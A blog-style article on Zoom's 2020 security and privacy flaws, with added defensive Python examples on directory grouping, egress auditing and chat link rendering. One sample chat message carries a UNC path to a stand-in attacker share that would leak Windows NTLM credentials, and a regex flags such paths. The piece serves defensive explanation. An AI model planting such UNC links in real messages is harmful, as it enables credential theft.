Zoom has quickly become one of the most used apps in our new quarantine world, used by workplaces, schools, and everyday individuals to stay connected to one another. But how dangerous is the app really? And how much of our personal data is left vulnerable thanks to Zoom?
Leaking User Email Addresses and Photos
There have been countless issues surrounding Zoom, most of them linked to ineffective security measures. Earlier this month Vice reported that at least a thousand Zoom users had their personal information, including their email addresses and photos, leaked to strangers, who were then able to start video calls with them through Zoom.
This occurred as a result of Zoom’s ‘Company Directory’ feature, which automatically adds people to a user’s contact list if their email addresses share the same domain. The feature was intended to make finding your work colleagues online easier, but many users who had signed up with their own personal email addresses reported that Zoom pooled them together and exposed their private information to one another.
Zoom’s website states that, by default, the feature only connects internal users in the same organisation and excludes public email domains such as Gmail, Yahoo or Hotmail. Yet many Dutch users found that Zoom connected them to thousands of strangers on public email providers that were not on that exclusion list.
@zoom_us I just had a look at the free for private use version of Zoom and registered with my private email. I now got 1000 names, email addresses and even pictures of people in the company Directory. Is this intentional? #GDPR pic.twitter.com/bw5xZIGtSE
— Jeroen J.V Lebon (@JJVLebon) March 23, 2020
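To make the failure mode concrete, here is an added example (not Zoom’s code) contrasting three grouping rules in Python: grouping by domain alone, grouping with a deny list of public providers, and grouping only domains an administrator has verified as belonging to their organisation. The users, domains and lists are constructed; ‘mailprovider.example’ stands in for a public email provider that a deny list happens to miss, which is exactly the gap the Dutch users fell into.

```python
"""Directory grouping by email domain: the weak rule beside two safer ones.

Added example, not Zoom's code. All users, domains and lists are constructed.
"""
from collections import defaultdict

# Constructed: a deny list of well-known consumer providers, the kind of list
# a "don't group public domains" rule relies on.
PUBLIC_DOMAINS_DENYLIST = {"gmail.com", "yahoo.com", "hotmail.com", "outlook.com"}

# Constructed: domains an organisation's admin has proven they control
# (for example via a DNS TXT record). Only these are grouped in the
# allow-list design.
VERIFIED_ORG_DOMAINS = {"examplecorp.example"}

# Constructed sign-ups. "mailprovider.example" stands in for a smaller public
# email service that is missing from the deny list.
USERS = [
    "alice@examplecorp.example",
    "bob@examplecorp.example",
    "carol@gmail.com",
    "dave@gmail.com",
    "erik@mailprovider.example",
    "fleur@mailprovider.example",
]


def domain_of(email: str) -> str:
    # Lower-case so Alice@Example.test and alice@example.test land in one group.
    return email.rsplit("@", 1)[1].lower()


def group_naive(users):
    """Weak rule: everyone sharing a domain becomes a contact."""
    groups = defaultdict(list)
    for u in users:
        groups[domain_of(u)].append(u)
    return dict(groups)


def group_denylist(users, denylist=PUBLIC_DOMAINS_DENYLIST):
    """Deny-list rule: skip known public providers, group everything else.
    Any public provider missing from the list is still grouped."""
    groups = defaultdict(list)
    for u in users:
        d = domain_of(u)
        if d not in denylist:
            groups[d].append(u)
    return dict(groups)


def group_allowlist(users, verified=VERIFIED_ORG_DOMAINS):
    """Default-deny rule: group only domains an admin has verified."""
    groups = defaultdict(list)
    for u in users:
        d = domain_of(u)
        if d in verified:
            groups[d].append(u)
    return dict(groups)


def exposed_strangers(groups, verified=VERIFIED_ORG_DOMAINS):
    """Users who can see other users without any organisational relationship:
    members of a multi-user group whose domain is not admin-verified."""
    return sorted(
        u
        for d, members in groups.items()
        if d not in verified and len(members) > 1
        for u in members
    )


if __name__ == "__main__":
    for name, rule in (("naive", group_naive), ("denylist", group_denylist),
                       ("allowlist", group_allowlist)):
        print(f"{name:10s} exposes: {exposed_strangers(rule(USERS))}")
```

The deny-list rule only works as well as the list is complete, and no list of public email providers is ever complete. Grouping only domains an administrator has explicitly verified turns the same feature into a default-deny one: a stranger on an unlisted provider is never pooled with anyone.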
Sending Data to Facebook without User Permission
As if having strangers automatically added to your contacts and given access to your personal info wasn’t enough, Zoom was also forced to update its iOS app earlier this year after a Motherboard analysis found that it was sending data about its users to Facebook, whether or not they had a Facebook account.
Analytics data transfers like this are often linked to Facebook because many apps use Facebook’s software development kit (SDK) to implement features such as logging in with a Facebook account. However, many users are unaware that using one product (such as Zoom) may be providing data to another service entirely.
What makes matters worse, nothing in Zoom’s privacy policy addressed this adequately. Its policy stated that the company may collect users’ ‘Facebook profile information when you use Facebook to log-in to our Products or to create an account for our Products’, but it did not mention sending data to Facebook about Zoom users who do not have a Facebook account.
Instead, as soon as a user downloaded and opened the app, Zoom connected to Facebook’s Graph API without the user’s knowledge. Data about the device (such as the model), the time zone and city the user was connecting from, the phone carrier, and a unique advertiser identifier that helps target advertisements at that user were all sent to Facebook.
In response to Motherboard’s findings, Zoom stated:
“To address this, in the next few days, we will be removing the Facebook SDK and reconfiguring the feature so that users will still be able to login with Facebook via their browser…. We sincerely apologize for this oversight, and remain firmly committed to the protection of our users’ data.”
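An egress audit is how findings like Motherboard’s are made: run the app through an intercepting proxy on first launch, then list every host it contacts and what it sends there. The Python below is an added example, not code from Zoom, Motherboard or Facebook; it runs that audit over constructed proxy log lines. The first-party host name, the request paths, the body fields and all values are assumptions made up for the example.

```python
"""Egress audit for an app's first launch: which hosts did it contact, and
which device or user identifiers went to third parties?

Added example, not Zoom's, Motherboard's or Facebook's code. The log lines,
hosts, paths and field names are constructed to resemble a proxy capture.
"""
import json
import re
from urllib.parse import urlsplit

# Constructed: hosts the app is expected to talk to (its own backend).
FIRST_PARTY_HOSTS = {"api.videoapp.example"}

# Constructed: body keys that identify a device or person when sent off-platform.
IDENTIFIER_KEYS = {"advertiser_id", "anon_id", "device_model", "carrier",
                   "timezone", "city"}

# Constructed proxy log, one request per line: "<time> <method> <url> <json body>"
SAMPLE_LOG = """\
2020-03-25T10:00:01Z POST https://api.videoapp.example/v1/launch {"app_version":"1.2.3"}
2020-03-25T10:00:01Z POST https://graph.facebook.com/v6.0/123456/activities {"event":"MOBILE_APP_INSTALL","advertiser_id":"AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE","anon_id":"a1b2c3","device_model":"iPhone10,3","carrier":"ExampleMobile","timezone":"Europe/Amsterdam","city":"Amsterdam"}
2020-03-25T10:00:02Z GET https://api.videoapp.example/v1/config {}
"""

LINE_RE = re.compile(r"^(?P<time>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<body>.*)$")


def parse_log(text):
    """Yield (host, method, body_dict) per well-formed line; skip the rest."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m["body"].strip()
        try:
            body = json.loads(raw) if raw else {}
        except json.JSONDecodeError:
            body = {}
        if not isinstance(body, dict):
            body = {}
        yield urlsplit(m["url"]).hostname, m["method"], body


def third_party_hosts(text, first_party=FIRST_PARTY_HOSTS):
    """Every host contacted that is not the app's own backend."""
    return sorted({h for h, _, _ in parse_log(text) if h not in first_party})


def leaked_identifiers(text, first_party=FIRST_PARTY_HOSTS):
    """Map each third-party host to the identifier keys it received."""
    found = {}
    for host, _, body in parse_log(text):
        if host in first_party:
            continue
        keys = IDENTIFIER_KEYS & set(body)
        if keys:
            found.setdefault(host, set()).update(keys)
    return {h: sorted(k) for h, k in found.items()}


if __name__ == "__main__":
    print("third-party hosts:", third_party_hosts(SAMPLE_LOG))
    for host, keys in leaked_identifiers(SAMPLE_LOG).items():
        print(f"{host} received: {', '.join(keys)}")
```

The same two questions apply to any app you ship or review: does the set of hosts contacted on a fresh install match what the privacy policy promises, and does any identifier that can be tied to a person leave for a host the user never chose to talk to?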
No End-to-End Encryption is Supported and Countless Flaws Leaving Users Vulnerable to Hijackers
If you thought that was the end of the list of security issues, I’m going to have to disappoint you. Zoom also does not support end-to-end encryption for its video or audio content. End-to-end encryption means that only the communicating parties hold the keys to what is said; calls are still encrypted between your device and Zoom’s servers, but Zoom itself is able to decrypt them.
Techradar also reported a flaw in the Zoom chat feature on Windows that criminals could exploit to steal users’ Windows login credentials. The chat feature converts URLs into clickable hyperlinks, and it did the same for Windows networking UNC paths (for example, \\server\share). If a user clicks such a link, Windows tries to open the share over SMB and automatically offers the user’s login name and NTLM password hash to the attacker’s server, where they can be cracked offline or relayed to another machine.
Hi @zoom_us & @NCSC – here is an example of exploiting the Zoom Windows client using UNC path injection to expose credentials for use in SMBRelay attacks. The screen shot below shows an example UNC path link and the credentials being exposed (redacted). pic.twitter.com/gjWXas7TMO
— Hacker Fantastic (@hackerfantastic) March 31, 2020
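The following Python is an added example, not Zoom’s code. It shows the link-rendering rule that causes the problem beside a hardened one that only links http(s) URLs, plus a helper that extracts the hosts a message’s UNC paths point to so a chat server or moderator could flag them. The sample message and the host name in it are constructed.

```python
"""Chat link rendering: the rule that turns UNC paths into clickable links,
beside one that links only web URLs. Added example, not Zoom's code; the
sample message and host name are constructed.
"""
import html
import re

# A web URL: http or https only.
WEB_URL = r"https?://[^\s<>\"]+"
# A UNC path: two backslashes, a host, a backslash, then a share/path.
UNC_PATH = r"\\\\[\w.-]+\\[^\s<>\"]+"

# Vulnerable rule: anything that looks like a URL *or* a UNC path is linked.
VULNERABLE_RE = re.compile(f"{WEB_URL}|{UNC_PATH}")
# Hardened rule: only web URLs become links; a UNC path stays plain text.
HARDENED_RE = re.compile(WEB_URL)


def render(message: str, link_re: re.Pattern) -> str:
    """HTML-escape the message and wrap every match of link_re in an <a> tag.
    Escaping is done on the pieces, so the link targets are never altered
    by the escaping and plain text can never inject markup."""
    out, pos = [], 0
    for m in link_re.finditer(message):
        out.append(html.escape(message[pos:m.start()]))
        target = m.group(0)
        out.append(f'<a href="{html.escape(target, quote=True)}">'
                   f'{html.escape(target)}</a>')
        pos = m.end()
    out.append(html.escape(message[pos:]))
    return "".join(out)


def linkify_vulnerable(message: str) -> str:
    """Clicking the UNC link makes Windows open an SMB connection to that host
    and offer the user's NTLM credentials, as the tweet above demonstrates."""
    return render(message, VULNERABLE_RE)


def linkify_hardened(message: str) -> str:
    """UNC paths are shown but not clickable; only http(s) URLs are links."""
    return render(message, HARDENED_RE)


def unc_targets(message: str) -> list:
    """Detection helper: the hosts named by UNC paths in a message."""
    return [m.group(1) for m in re.finditer(r"\\\\([\w.-]+)\\", message)]


# Constructed sample: an attacker-controlled share beside a legitimate link.
MESSAGE = r"Notes are at \\files.attacker.example\share\notes.txt and https://example.com/doc"

if __name__ == "__main__":
    print("vulnerable:", linkify_vulnerable(MESSAGE))
    print("hardened:  ", linkify_hardened(MESSAGE))
    print("UNC hosts: ", unc_targets(MESSAGE))
```

The application-side fix is simply to stop treating UNC paths as links. Independently of any one app, Windows administrators can stop the credential from ever leaving the machine with the policy ‘Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers’ and by blocking outbound SMB (TCP port 445) at the network edge, which closes the same hole for every program that renders untrusted links.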
Researcher Patrick Wardle found two flaws in Zoom on Apple Mac devices. One allowed malicious code injected into the running Zoom app to inherit Zoom’s existing permission to use the webcam and microphone, giving a hijacker control over both without any further permission prompt. The other allowed malicious code to be injected into Zoom’s installer, which runs part of its work with root privileges, giving the attacker access to the whole operating system and letting them install malware without the user noticing.
With all the negative buzz and anxiety felt about Zoom, I’m thinking it might be time to go back to old video conferencing services such as Skype. Although it appears Google might be swooping in to save the day by adding new features to their video conferencing services, such as a very Zoom-like gallery view on their Google Meet service.